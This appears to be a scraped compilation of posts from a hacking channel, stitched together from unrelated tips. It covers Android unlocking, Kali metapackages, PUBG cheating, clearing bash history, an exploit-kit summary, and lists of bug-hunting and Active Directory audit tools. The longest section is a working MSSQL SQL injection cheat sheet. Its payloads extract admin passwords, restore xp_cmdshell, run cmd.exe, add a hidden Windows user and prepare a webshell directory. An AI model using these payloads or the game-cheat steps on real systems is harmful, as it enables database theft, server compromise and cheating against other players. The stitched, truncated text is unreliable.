▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Five ways to unlock your Android smartphone with gloves and a mask :

1) Add a trusted bluetooth device
If you are wearing a smartwatch or fitness band, you can use it to unlock your smartphone. In this case, you can leave the reliable biometric protection and pin code on the lock screen enabled. At the same time, using a wearable device, you can easily unlock the device.

To activate, open Settings> Security> Smart lock> Trusted devices. Make sure Bluetooth is turned on on your machine and select Add Trusted Device. Here you will see a list of Bluetooth devices you have connected to before. Select your smartwatch or fitness band and add it.

2) Use an iris scanner on older Samsung flagships
If you have one of the Samsung smartphones listed below, there is an assisted biometric authentication method. The mask and gloves do not bother him. It is an iris scanner. It is enabled under Settings> Biometrics & Security> Iris Scanner> Register Shell.

3) Use an ultrasound scanner on Samsung's new flagships
If you have the latest generation of Samsung flagship smartphones, there is an ultrasonic fingerprint scanner inside the screen. Unlike optical fingerprint scanners on other smartphones, ultrasound uses high-frequency ultrasound to create a clear image of your finger. This sound can pass through delicate materials including latex on protective gloves.

Samsung Galaxy S10

Samsung Galaxy S10 +

Samsung Galaxy Note10

Samsung Galaxy Note 10+

Samsung Galaxy S20

Samsung Galaxy S20 +

Samsung Galaxy S20 Ultra

4) Body recognition
If you don't have a smartwatch, fitness band, or Samsung flagship smartphone, there are still options. Open Settings> Security> Smartlock> Body recognition.

Once activated, the smartphone will remain unlocked while it detects your movements. For example, when you hold it in your hands or put it in your pocket or wallet. If the device is on a table and you are not nearby, it is locked for strangers.

5) Use gestures instead of password and pin code
If you use manual authorization methods such as a password or PIN, you can switch to lock screen gestures and save time. It is less secure than a password, but it only takes one move. You don't need finger dexterity and just take one finger out of the glove.

Open Settings> Security> Lock screen and select a pattern, then follow the instructions.
Your not allowed to copy ou
r tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑- Parrot-kali :Metapackages and Virtual Package:
#UnderstandingLinux

It is important to clearly distinguish between metapackages and virtual packages. The former are real packages (including real .deb files) whose sole purpose is to express dependencies.

Virtual packages, however, do not physically exist; they are only a means of identifying real packages based on common logical criteria (for example, services provided or compatibility with a standard program or an existing package). Sometimes virtual packages are used as short, convenient, or more commonly used aliases for real packages.

🦑List of Kali Linux Metapackages

1) System

2) kali-linux-core : A basic Kali Linux system - basic elements that are always present in any installation

3) kali-linux-default : "Standard" system images that you can download from the download page (AMD64 / i386) include the tools of these images

4) kali-linux-light : Used to create an image of Kali-Light, a light version of the system

5) kali-linux-arm : All tools suitable for ARM devices

6) kali-linux-nethunter : Tools used as part of Kali NetHunter

7) Desktop environments / window managers

8) Desktop environments are full-fledged graphical shells like GNOME, Cinnamon, KDE, XFCE and others.

9) Window managers perform only some of the functions of the graphical interface, in fact, they only allow you to open several windows, add a desktop background, and can have a simple menu. Due to this simplicity, window managers consume a minimum of resources. But from the point of view of user convenience, they are inferior to a full-fledged desktop environment.

10) kali-desktop-core : Any key tools needed to display the GUI.

11) kali-desktop-e17 : Enlightenment (window manager)

12) kali-desktop-gnome : GNOME (desktop environment)

13) kali-desktop-i3 : i3 (window manager)

14) kali-desktop-kde : KDE (desktop environment)

15) kali-desktop-lxde : LXDE (window manager)

16) kali-desktop-mate : MATE (desktop environment)

17) kali-desktop-xfce : XFCE (window manager)
Tools

18) kali-tools-gpu : Tools that work best when you have GPU access

19) kali-tools-hardware : Hardware Hacking Tools

20) kali-tools-crypto-stego : Tools based on cryptography and steganography

21) kali-tools-fuzzing : For fuzzing protocols

22) kali-tools-802-11 : 802.11 (commonly known as "Wi-Fi")

23) kali-tools-bluetooth : For targeting bluetooth devices.

24) kali-tools-rfid : RFID tools

25) kali-tools-sdr : Software-Defined Radio Tools

26) kali-tools-voip : Voice over IP tools

27) kali-tools-windows-resources : Any programs that can run on Windows hosts.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pubg best hacks:

1) First, you need to install the ZAchiever on your mobile phone, which can help you to start the process for your game.

2) Then you have to extract the PUBG Hacking Script file on your Android, which helps to start the hacking process.

3) Next, you have to download the Game Guardian, Strange VPN, and PUBG Game so that you can select the hack schemes.

4) After this, you have to open the dual space and make the clones of PUBG Mobile Game and Game Guardian.

5) Then you have to open the Game Guardian and select the hacking script to execute for the hacking process. It is a must to select the script as, without a script, the process will not run forward.

6) At last, you have to open the PUBG game on your mobile, and there you will able to see a Game Guardian icon floating on the screen. By clicking on that icon, you can perform various tasks in the game such as Wallhack, Automatic Headshots, and many more. There are many other hacks also that you can apply after hacking this game, such as change body color of the player, high damage of enemies, etc.

7) After completing these steps, you are ready with your hacking process, and now you can hack any of the PUBG and perform different tasks.

8) There are various tools available to hack the game, but you can follow these steps it will help you to get a proper hacking game.

5 wiki resources same way :)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WEB EXPLOITS FREE COURSES :

1) [WebSploit](https://websploit.h4cker.org/) is a virtual machine (VM) created by [Omar Santos](https://omarsantos.io) for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions delivered at [DEFCON](https://www.wallofsheep.com/blogs/news/packet-hacking-village-workshops-at-def-con-26-finalized),

2) [Live Training in Safari](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=live%20online%20training&sort=relevance),

3) [video on demand LiveLessons](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=video&sort=relevance), and others.

The purpose of this VM is to have a lightweight (single VM) with a few web application penetration testing tools, as well as vulnerable applications.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to clear bash history on logout:

How do I automatically clear the GNU Bourne-Again SHell history when exiting the shell?

1) Disable the HISTFILE shell variable at login to prevent command history from being saved when you exit the shell.

$ echo "unset HISTFILE" | sudo tee /etc/profile.d/unset_histfile.sh
Optionally, set the HISTSIZE shell variable to 0 at logon so that commands executed are not stored in the history list.
Attention, this is very inconvenient, as it will completely disable the history in the login shell.
$ echo "HISTSIZE = 0" | sudo tee /etc/profile.d/disable_histsize.sh
Create a /etc/bash.bash_logout file to execute when the shell exits.

Use it to clear history.

2) Don't worry, it will be executed after a separate login shell cleanup file ~ / .bash_logout.

$ echo "history -c" | sudo tee /etc/bash.bash_logout
Note, it will not write an empty history list to the history file.

3) Adding a second command to write the history list to the history file will not work since the HISTFILE shell variable has not been set.
This also means that the history list will not be initialized from the history file on startup.
Delete the existing ~ /.bash_history file to keep everything in order.
But be aware of other users.

4) You can always save the history list to a special file.

Note that this will add the current history list to the file.
$ HISTFILE = session_history.txt history -w
$ cat session_history.txt
cat .bash_history
HISTFILE = session_history.txt history -w

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS NEPTUNE EXPLOIT:

1) Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.

2) Neptune has gained popularity and is still used in 1) malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye has recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.

3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club . One such malicious site also mimics the YouTube video to MP3 converter.


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BUG HUNTER full :

Information Gathering
Mapping
Discovery
Exploitation
PoCs & Reporting
Information Gathering :
Basic Commands for Information Gathering
Masscan - TCP Port Scanner
DNS Recon - DNS Enumeration
Sublist3r - Find Subdomains
Alt-DNS - Subdomain Discovery
Amass - In-Depth DNS Enumeration
Subfinder - Subdomain Discovery Tool
Enumall - Setup Script for Regon-NG
Aquatone - Reconnaissance on Domain Names
Cloudflare_Enum - Cloudflare DNS Enumeration
InfoG - Information Gathering Tool
The Harvester - E-mail, SubDomain, Ports etc.
Recon-NG - Web Reconnaissance Framework
SetoolKit - Social Engineering Toolkit
WhatWeb - Next Generation Web Scanner
Maltego - Interactive Data Mining Tool
Mapping :
Nmap - IP's, Open Ports and Much More
Firefox - Web Browser
Firefox Browser Extensions
Burp Suite Pro
Burp Suite Extensions
Intruder Payloads for Burp Suite
Payloads All The Thing
Discovery :
Acunetix-WVS
Arachni
Burp Suite
Nexpose
Nikto
Vega
Wapiti
Web Security Scanner
Websecurify Suite
Joomscan
w3af
Zed Attack Proxy
WP-Scan
FuzzDB
CeWL
Exploitation :
XSS :

XSS Radar
XSSHunter
xssHunter Client
DOMxssScanner
XSSer
BruteXSS
XSStrike
XSS'OR
SQLi :

SQLmap
XXE :

OXML-xxe
XXEinjextor
SSTI :

Tplmap
SSRF :

SSRF-Detector
Ground Control
LFI :

LFISuit
Mobile :

MobSF
GenyMotion
Apktool
dex2jar
jd-gui
idb
Other :

Gen-xbin-Avi
GitTools
DVCS Ripper
TKO Subs
SubBruteforcer
Second-Order
Race The Web
CORStest
RCE Struts-pwn
ysoSerial
PHPGGC
Retire-js
Getsploit
Findsploit
BFAC
WP-Scan
CMSmap
Joomscan
JSON W T T
Wfuzz
Patator
Netcat
ChangeMe
wappalyzer
builtwith
wafw00F
LinkFinder
PoCs & Reporting
Bug Bounty Platforms
POCs (Proof of Concepts)
CheatSheet
EyeWitness
HttpScreenshot
BugBountyTemplates
Template Generator

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/thehackingsage/bughunter.git &&

2) cd bughunter && chmod +x bughunter.py && sudo cp bughunter.py /usr/bin/bughunter

that's it.. type bughunter in terminal to execute the tool.

Video Tutorial : https://www.youtube.com/watch?v=opvQIgUD0Jc&t=18s

don't clone our tutorials
✅git topic
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Adaudit - Powershell script to automate domain auditing:

F E AT U R E S :

What does he do ?

Device Information
Get-HostDetails
Domain audit
Get-MachineAccountQuota
Get-SMB1Support
Get-FunctionalLevel
Get-DCsNotOwnedByDA
Domain trust audit
Get-DomainTrusts
User Account Audit
Get-InactiveAccounts
Get-DisabledAccounts
Get-AdminAccountChecks
Get-NULLSessions
Get-AdminSDHolders
Get-ProtectedUsers
Auditing password information
Get-AccountPassDontExpire
Get-UserPasswordNotChangedRecently
Get-PasswordPolicy
Dumps NTDS.dit
Get-NTDSdit
Object audit
Get-OldBoxes
GPO audit (and checking SYSVOL passwords)
Get-GPOtoFile
Get-GPOsPerOU
Get-SYSVOLXMLS
Check general rights of AD group
Get-OUPerms
Check for LAPS on the domain
Get-LAPSStatus
Check for policies and authentication stores
Get-AuthenticationPoliciesAndSilos
Launch arguments
The following flags can be used in combination with running a script

-hostdetails retrieves the hostname and other useful audit information
-domainaudit retrieves AD information such as functional level
-trusts retrieves information about any trust relationship with the domain
-accounts identifies account problems such as expired, disabled, etc ...
-passwordpolicy returns password policy information
-ntds outputs the NTDS.dit file using ntdsutil
-oldbox identifies legacy OSs like XP / 2003 joined to a domain
-gpo outputs GPOs in XML and HTML for later analysis
-uperms checks for common OU permissions issues
-laps checks if LAPS is installed
-authpolsilos checks for the existence of policies and authentication stores
-all runs all checks, e.g. AdAudit.ps1 -all


DOWNLOAD:
https://github.com/phillips321/adaudit

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

1) Determine whether there is an injection point
'; and 1=1 and 1=2

2) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists

3) Guess the number of accounts. If you encounter 0<return to the correct page 1<return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)

5) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.

and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)

and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)


🦑Guess the character

6) and 1=(select count(*) from admin where left(name,1)='a')
and 1=(select count(*) from admin where left(name,2)='ab')-
Just add one character at a time and guess like this. If you guess how many digits you just guessed, it's correct, and the account number is calculated.

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query sentence can guess the user and password in Chinese. Just change the number after it to the ASSIC code in Chinese and it is OK. Finally, the result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

7) Look at the server patch = something went wrong and SP4 patch was applied

and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

8) Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)

and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
See if xp_cmdshell is deleted


and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--
xp_cmdshell is deleted, restored, supports absolute path restoration
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

9) Reverse PING own experiment

;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

10) Add account


;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory E:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"'--
Access attributes: (cooperate with writing a webshell)

11) declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Explosive library Special skills: %5c='\' or submit / and \ modify %5
and 0<>(select top 1 paths from newtable)--

12) Get the library name (from 1 to 5 are the system id, 6 or more can be judged)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7, 8, 9.... to get more database names

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) UID18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) admin一user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)
and 0<(select user_id from BBS.dbo.admin where username>1) 可
You can get the password in turn. . . . . Suppose there are fields such as user_id username and password

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access)

13)Get the WEB path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- image—cmd


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement: